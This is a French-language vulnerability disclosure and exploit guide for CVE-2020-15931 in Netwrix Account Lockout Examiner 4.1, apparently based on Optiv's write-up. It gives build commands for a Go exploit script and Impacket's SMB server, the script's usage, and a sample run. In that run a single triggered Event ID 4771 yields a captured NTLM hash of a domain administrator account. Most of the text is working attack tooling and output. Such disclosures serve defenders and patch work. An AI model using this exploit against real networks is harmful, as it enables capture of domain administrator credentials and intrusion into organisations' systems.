
Netwrix Account Lockout Examiner 4.1 Vulnérabilité de divulgation des informations d'identification du compte administrateur de domaine
Netwrix Account Lockout Examiner (ALE) avant la version 5.1 permet à un adversaire distant non authentifié de déclencher une connexion vers un système contrôlé par l'attaquant et de capturer la réponse NTLMv1/v2 d'un compte disposant de privilèges d'administrateur de domaine. Le compte administrateur de domaine serait déjà configuré avec le produit comme requis pour l'installation. Un adversaire peut exploiter cela en générant un seul événement Kerberos Pre-Authentication Failed (Event ID 4771) sur un contrôleur de domaine.
Plus de détails sur la vulnérabilité peuvent être trouvés sur le blog suivant Blog

La vulnérabilité a été découverte dans la nature par Robert Surace (@robsauce) et Daniel Min (@bigb0ss), consultants en sécurité chez Optiv, lors d'une évaluation de sécurité. Après l'identification de CVE-2020-15931, Optiv a immédiatement contacté Netwrix pour divulguer le défaut identifié de manière responsable.
Le script d'exploitation a été développé en golang. Installez les dépendances suivantes :
go get github.com/fatih/color
go get github.com/ropnop/gokrb5/client
go get github.com/ropnop/gokrb5/config
Il utilise également smbserver.py d'Impacket.
pip install impacket
Enfin, téléchargez le script d'exploitation et compilez-le.
git clone https://github.com/optiv/CVE-2020-15931
go build cve-2020-15931.go
$ ./cve-2020-15931
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
Required:
-d Domain name
-dc Domain controller
-u Valid username
Optional:
-h Print this help menu
Example:
./cve-2020-15931 -d target.com -dc 10.10.0.2 -u jsmith
(Note : Au moment de la rédaction, cette attaque ne peut être identifiée que par une attaque aveugle. En effet, il est difficile de déterminer si l'organisation cible utilise Netwrix Account Lockout Examiner sur son réseau pour auditer les authentifications de comptes ou non.)
$ ./cve-2020-15931 -d bosslab.com -dc 10.10.0.2 -u b0ss1
_______ ________ ___ ___ ___ ___ __ _____ ___ ____ __
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ | ____/ _ \___ \/_ |
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | |__| (_) |__) || |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| |___ \\__, |__ < | |
| |____ \ / | |____ / /_| |_| / /_| |_| | | |___) | / /___) || |
\_____| \/ |______| |____|\___/____|\___/ |_|____/ /_/|____/ |_|
[robSauce & bigb0ss] v1.0
[+] Netwrix Account Lockout Examiner 4.1 Exploit Script
[+] DC: 10.10.0.2
[+] Domain: bosslab.com
[+] Username: b0ss1
[+] Password: wrongPass
[+] Event ID 4771 (Kerberos Pre-Authentication Failed) Triggered!
[+] If vulnerable, you will get a NTLMv1/2 of the Netwrix service account.
[+] SMB Server Started...
Impacket v0.9.22.dev1+20200607.100119.b5c61678 - Copyright 2020 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.0.2,59264)
[*] AUTHENTICATE_MESSAGE(BOSSLAB\Administrator,BOSSLAB-DC01)
[*] User BOSSLAB-DC01\Administrator authenticated successfully
[*] Administrator::BOSSLAB:17dcc32c6eafc48d:f798e7c906eb1b639722614f1417ded1:0101000000000000be18...REDACTED...0000000
[*] Disconnecting Share(1:IPC$)
[*] Closing down connection (10.10.0.2,59264)
[*] Remaining connections []
Netwrix Account Lockout Examiner 5.1
Event ID 4771
Impacket smbserver.py
Gokrb5 Client
CVE-2020-15931